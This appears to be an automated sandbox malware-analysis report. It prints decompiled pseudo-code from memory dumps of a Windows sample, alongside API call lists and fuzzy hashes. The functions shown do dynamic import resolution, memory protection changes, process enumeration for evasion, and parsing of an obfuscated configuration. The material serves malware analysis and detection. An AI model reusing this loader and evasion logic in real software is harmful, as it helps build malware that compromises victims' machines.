                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: db7da8299ab94e7ba041335972916182212d283b7581548aad5d8cb1d747b8b5
                                                          • Instruction ID: 5c8a6c960d72656f24d3cebfa1a52520dfdabda7ab98ce2f8b188d2eb93442af
                                                          • Opcode Fuzzy Hash: db7da8299ab94e7ba041335972916182212d283b7581548aad5d8cb1d747b8b5
                                                          • Instruction Fuzzy Hash: BF218875200285EBCB19DF69DC89EAE3BBCFB98340F104425F941DB150D770E905AB72
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E10001E55() {
                                                          				char _v16;
                                                          				intOrPtr _v28;
                                                          				void _v32;
                                                          				void* _v36;
                                                          				intOrPtr _t15;
                                                          				void* _t16;
                                                          				long _t25;
                                                          				int _t26;
                                                          				void* _t30;
                                                          				intOrPtr* _t32;
                                                          				signed int _t36;
                                                          				intOrPtr _t39;
                                                          
                                                          				_t15 =  *0x10004144;
                                                          				if( *0x1000412c > 5) {
                                                          					_t16 = _t15 + 0x100050f9;
                                                          				} else {
                                                          					_t16 = _t15 + 0x100050b1;
                                                          				}
                                                          				E100016F1(_t16, _t16);
                                                          				_t36 = 6;
                                                          				memset( &_v32, 0, _t36 << 2);
                                                          				if(E1000132A( &_v32,  &_v16,  *0x10004140 ^ 0xfd7cd1cf) == 0) {
                                                          					_t25 = 0xb;
                                                          				} else {
                                                          					_t26 = lstrlenW( *0x10004138);
                                                          					_t8 = _t26 + 2; // 0x2
                                                          					_t11 = _t26 + _t8 + 8; // 0xa
                                                          					_t30 = E10001ADA(_t39, _t11,  &_v32,  &_v36); // executed
                                                          					if(_t30 == 0) {
                                                          						_t32 = _v36;
                                                          						 *_t32 = 0;
                                                          						if( *0x10004138 == 0) {
                                                          							 *((short*)(_t32 + 4)) = 0;
                                                          						} else {
                                                          							E10002033(_t44, _t32 + 4);
                                                          						}
                                                          					}
                                                          					_t25 = E10001634(_v28); // executed
                                                          				}
                                                          				ExitThread(_t25);
                                                          			}
















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: ExitThreadlstrlen
                                                          • String ID:
                                                          • API String ID: 2636182767-0
                                                          • Opcode ID: 116678ed17733bd9ed3f22f480b5e3fd2a9bdbacc699d8402b25238a8187df7b
                                                          • Instruction ID: ab8ed00748b6518aaca1cd8150c39477dba6cc77ca46683760519d6ad69b4fbf
                                                          • Opcode Fuzzy Hash: 116678ed17733bd9ed3f22f480b5e3fd2a9bdbacc699d8402b25238a8187df7b
                                                          • Instruction Fuzzy Hash: C4115B725082469BF711DB64CC89ECB77ECEB583C0F02082AF951D71A9EB30E6458B96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E005E58DB(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E005EA71F(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E005EA734(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}










                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E1FA0,74B5F710,00000000,?,?,005E1FA0), ref: 005E58F3
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E1FA0,005E1FA1,?,?,005E1FA0), ref: 005E5910
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: c35273bf93510ad57aebd0ef8224d4b5ff06bd64899e81d8eeb0d5dc76db7721
                                                          • Instruction ID: 8cfd5cedf334d13921fb8676d9e6f8e8d620bd18bddd84d08abb910897aa6908
                                                          • Opcode Fuzzy Hash: c35273bf93510ad57aebd0ef8224d4b5ff06bd64899e81d8eeb0d5dc76db7721
                                                          • Instruction Fuzzy Hash: C4F0902A600286EAEB15D7AA9C05EAF2AFCEBC4714F210059A540E3101EA70EE01D660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x5ed23c) == 0) {
                                                          						E005E1B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x5ed23c) == 1) {
                                                          						_t10 = E005E12E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(005ED23C), ref: 005E4EDF
                                                            • Part of subcall function 005E12E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E12F8
                                                          • InterlockedDecrement.KERNEL32(005ED23C), ref: 005E4EFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: ec2bd8841c8d946748ba89f88dd5d24fc0ac58c67d035c6c47379aa7c7d9ca11
                                                          • Instruction ID: 5a0a4fcd8b7e5f560252f7115c66061a3efde2fdc614dbc53564d1205f1fb079
                                                          • Opcode Fuzzy Hash: ec2bd8841c8d946748ba89f88dd5d24fc0ac58c67d035c6c47379aa7c7d9ca11
                                                          • Instruction Fuzzy Hash: C3E086352081F693972D1FB79D5DB7EAE56BF90F80F024424F9D1D5150D620CC41AAA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E100016F1(void* __eax, intOrPtr _a4) {
                                                          
                                                          				 *0x10004150 =  *0x10004150 & 0x00000000;
                                                          				_push(0);
                                                          				_push(0x1000414c);
                                                          				_push(1);
                                                          				_push(_a4);
                                                          				 *0x10004148 = 0xc; // executed
                                                          				L10001A3E(); // executed
                                                          				return __eax;
                                                          			}




                                                          APIs
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001E82,00000001,1000414C,00000000), ref: 1000170F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: DescriptorSecurity$ConvertString
                                                          • String ID:
                                                          • API String ID: 3907675253-0
                                                          • Opcode ID: c61367c42b0475a435da7ef8647a919691ac96a9d7cf21db5be20c61e91521ee
                                                          • Instruction ID: c754c69a99eee57bc17a19cef26cf4e48c55fe35ecd49d9a529ee64d39f5317a
                                                          • Opcode Fuzzy Hash: c61367c42b0475a435da7ef8647a919691ac96a9d7cf21db5be20c61e91521ee
                                                          • Instruction Fuzzy Hash: 5AC04CF8241350A6F620DF408C85FC57A51B7A5785F124504F214251D9CBB51094851D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E10001634(void* __eax) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				void* __edi;
                                                          				void* _t18;
                                                          				long _t24;
                                                          				long _t26;
                                                          				long _t29;
                                                          				intOrPtr _t40;
                                                          				void* _t41;
                                                          				intOrPtr* _t42;
                                                          				void* _t44;
                                                          
                                                          				_t41 = __eax;
                                                          				_t16 =  *0x10004140;
                                                          				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4);
                                                          				_t18 = E10001146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                          				if(_t18 != 0) {
                                                          					_t29 = 8;
                                                          					goto L8;
                                                          				} else {
                                                          					_t40 = _v8;
                                                          					_t29 = E10001CBE(_t33, _t40, _t41);
                                                          					if(_t29 == 0) {
                                                          						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                          						_t24 = E10001BAC(_t40, _t44); // executed
                                                          						_t29 = _t24;
                                                          						if(_t29 == 0) {
                                                          							_t26 = E10001020(_t44, _t40);
                                                          							_t29 = _t26;
                                                          							if(_t29 == 0) {
                                                          								_push(_t26);
                                                          								_push(1);
                                                          								_push(_t40);
                                                          								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                          									_t29 = GetLastError();
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					_t42 = _v12;
                                                          					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                          					E1000201E(_t42);
                                                          					L8:
                                                          					return _t29;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 10001146: GetModuleHandleA.KERNEL32(?,00000020), ref: 1000116A
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 1000118C
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011A2
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011B8
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011CE
                                                            • Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011E4
                                                            • Part of subcall function 10001CBE: memcpy.NTDLL(?,?,?,?,?,?,?,?,1000167E,?), ref: 10001CF5
                                                            • Part of subcall function 10001CBE: memcpy.NTDLL(?,?,?), ref: 10001D2A
                                                            • Part of subcall function 10001BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001BE4
                                                            • Part of subcall function 10001020: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 10001059
                                                            • Part of subcall function 10001020: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 100010CE
                                                            • Part of subcall function 10001020: GetLastError.KERNEL32 ref: 100010D4
                                                          • GetLastError.KERNEL32 ref: 100016B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                          • String ID:
                                                          • API String ID: 2673762927-0
                                                          • Opcode ID: 128863c4b96fdd5e0b5520693e17a9650446fa3d9ad2d900b697df63d12b79e3
                                                          • Instruction ID: 2910a6364c5bb3ba5c3e70b9206c46a00ef4e134a19efb6f23cc70e8801df8ba
                                                          • Opcode Fuzzy Hash: 128863c4b96fdd5e0b5520693e17a9650446fa3d9ad2d900b697df63d12b79e3
                                                          • Instruction Fuzzy Hash: 3311087A7003126BE721DBA98CC0DDF77BCEF882847054128F901D7649EBA1ED0687A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E005E1AE2(intOrPtr* __edi) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t21;
                                                          
                                                          				_t21 = __edi;
                                                          				_push( &_v12);
                                                          				_push(__edi);
                                                          				_v8 = 0x1d4c0;
                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                          				while(1) {
                                                          					_v16 = _t15;
                                                          					Sleep(0x1f4); // executed
                                                          					if(_v12 == 4) {
                                                          						break;
                                                          					}
                                                          					if(_v8 == 0) {
                                                          						L4:
                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                          						continue;
                                                          					} else {
                                                          						if(_v8 <= 0x1f4) {
                                                          							_v16 = 0x80004004;
                                                          						} else {
                                                          							_v8 = _v8 - 0x1f4;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          					L8:
                                                          					return _v16;
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 005E1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: d40a0301c6a721493995a688e75de626dc268f546505ab4cc2a05e38d8295d7c
                                                          • Instruction ID: dae0f02355729548bbd1ac613e5def194874e836744cd615b38dd780eeee8556
                                                          • Opcode Fuzzy Hash: d40a0301c6a721493995a688e75de626dc268f546505ab4cc2a05e38d8295d7c
                                                          • Instruction Fuzzy Hash: 05F03775D01258EFCB08DB95C988AEDBBBCFF04304F1084AAE542A7200E7B46B84DF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E005E888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x5ed2a4; // 0x63699bc3
                                                          				_t1 =  &_v12; // 0x5e5d25
                                                          				if(E005E7145( &_v8, _t1, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x5ed2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x5ed2a4; // 0x63699bc3
                                                          				_t5 =  &_v12; // 0x5e5d25
                                                          				if(E005E7145( &_v16, _t5, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					_t25 =  &_v12; // 0x5e5d25
                                                          					return  *_t25;
                                                          				}
                                                          				_t37 =  *0x5ed2a4; // 0x63699bc3
                                                          				_t8 =  &_v12; // 0x5e5d25
                                                          				if(E005E7145(_t8,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x5ed238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t9 =  &_v12; // 0x5e5d25
                                                          					_t97 =  *_t9;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t43 = E005E6B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x5ed240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t44 = E005E6B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x5ed244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t45 = E005E6B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x5ed248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t46 = E005E6B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x5ed004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t47 = E005E6B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x5ed02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t48 = E005E6B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E005E56FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E005E6702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t49 = E005E6B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E005E56FA(0, _t49) != 0) {
                                                          						_t114 =  *0x5ed32c; // 0x16695b0
                                                          						E005E23F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x5ed2a4; // 0x63699bc3
                                                          						_t50 = E005E6B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x5ed2a8; // 0x107a5a8
                                                          						_t20 = _t51 + 0x5ee252; // 0x616d692f
                                                          						 *0x5ed2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E005E56FA(0, _t50);
                                                          						 *0x5ed2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x5ed2a4; // 0x63699bc3
                                                          								_t53 = E005E6B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x5ed2a8; // 0x107a5a8
                                                          								_t21 = _t54 + 0x5ee791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E005E56FA(0, _t53);
                                                          							}
                                                          							 *0x5ed340 = _t55;
                                                          							HeapFree( *0x5ed238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E8933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E8965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E8997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E89C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008), ref: 005E89FB
                                                          • HeapFree.KERNEL32(00000000,%]^,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008,?,005E5D25), ref: 005E8AF2
                                                          • HeapFree.KERNEL32(00000000,?,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005,005ED00C,00000008,?,005E5D25), ref: 005E8B05
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: %]^
                                                          • API String ID: 3298025750-1107362547
                                                          • Opcode ID: 3311b09d6926ad5e46d0e50ae5356d5b54770c39f88e23de9cbd804199e9cb6f
                                                          • Instruction ID: c2da91b06033bff2838765b36c07a6972753b5bde4a4baef8c3b8752bba5ae47
                                                          • Opcode Fuzzy Hash: 3311b09d6926ad5e46d0e50ae5356d5b54770c39f88e23de9cbd804199e9cb6f
                                                          • Instruction Fuzzy Hash: D6719E75E001C5AEC71CEBBA8DC897B7FFDFB983407280822E5C9DB111EA31D9499621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E005EA65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x5ed2a8; // 0x107a5a8
                                                          						_t2 = _t9 + 0x5eee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x5ed0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005EA66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 005EA67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 005EA6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 005EA6BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID: `7^
                                                          • API String ID: 420147892-2873282293
                                                          • Opcode ID: 5edd9baaecdf9db8b702d4118425098a9b3a2de0a99113fb0f1fd82b5b6098a3
                                                          • Instruction ID: 829943daf88d42aaa2a3f8269d9f227edf930dca6c9b48adea0e60d6ea40cc1b
                                                          • Opcode Fuzzy Hash: 5edd9baaecdf9db8b702d4118425098a9b3a2de0a99113fb0f1fd82b5b6098a3
                                                          • Instruction Fuzzy Hash: 20F0F6369011A56AD728A7739C8DDEB7E6DFBC6310F0501A1F9C5C2000EA30DE498AB6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E10001F0E() {
                                                          				void* _t1;
                                                          				unsigned int _t3;
                                                          				void* _t4;
                                                          				long _t5;
                                                          				void* _t6;
                                                          				intOrPtr _t10;
                                                          				void* _t14;
                                                          
                                                          				_t10 =  *0x10004130;
                                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x1000413c = _t1;
                                                          				if(_t1 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t3 = GetVersion();
                                                          				if(_t3 != 5) {
                                                          					L4:
                                                          					if(_t14 <= 0) {
                                                          						_t4 = 0x32;
                                                          						return _t4;
                                                          					} else {
                                                          						goto L5;
                                                          					}
                                                          				} else {
                                                          					if(_t3 >> 8 > 0) {
                                                          						L5:
                                                          						 *0x1000412c = _t3;
                                                          						_t5 = GetCurrentProcessId();
                                                          						 *0x10004128 = _t5;
                                                          						 *0x10004130 = _t10;
                                                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                          						 *0x10004124 = _t6;
                                                          						if(_t6 == 0) {
                                                          							 *0x10004124 =  *0x10004124 | 0xffffffff;
                                                          						}
                                                          						return 0;
                                                          					} else {
                                                          						_t14 = _t3 - _t3;
                                                          						goto L4;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001462,74B063F0), ref: 10001F1D
                                                          • GetVersion.KERNEL32 ref: 10001F2C
                                                          • GetCurrentProcessId.KERNEL32 ref: 10001F48
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                          • String ID:
                                                          • API String ID: 845504543-0
                                                          • Opcode ID: 6b78b0ba66763b1fda00833f905b6321ffd1b1deaffe8dbc06cc9ba591ad23f3
                                                          • Instruction ID: 81d6f718ae41dea5634b5d6ac1f0cee9f6b854f783bc08cc4c4759fd43992b84
                                                          • Opcode Fuzzy Hash: 6b78b0ba66763b1fda00833f905b6321ffd1b1deaffe8dbc06cc9ba591ad23f3
                                                          • Instruction Fuzzy Hash: 50F0AFB06453329BF7019F68ADA97D63BE4E7097D2F024125F641C61ECDBB095828B4C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
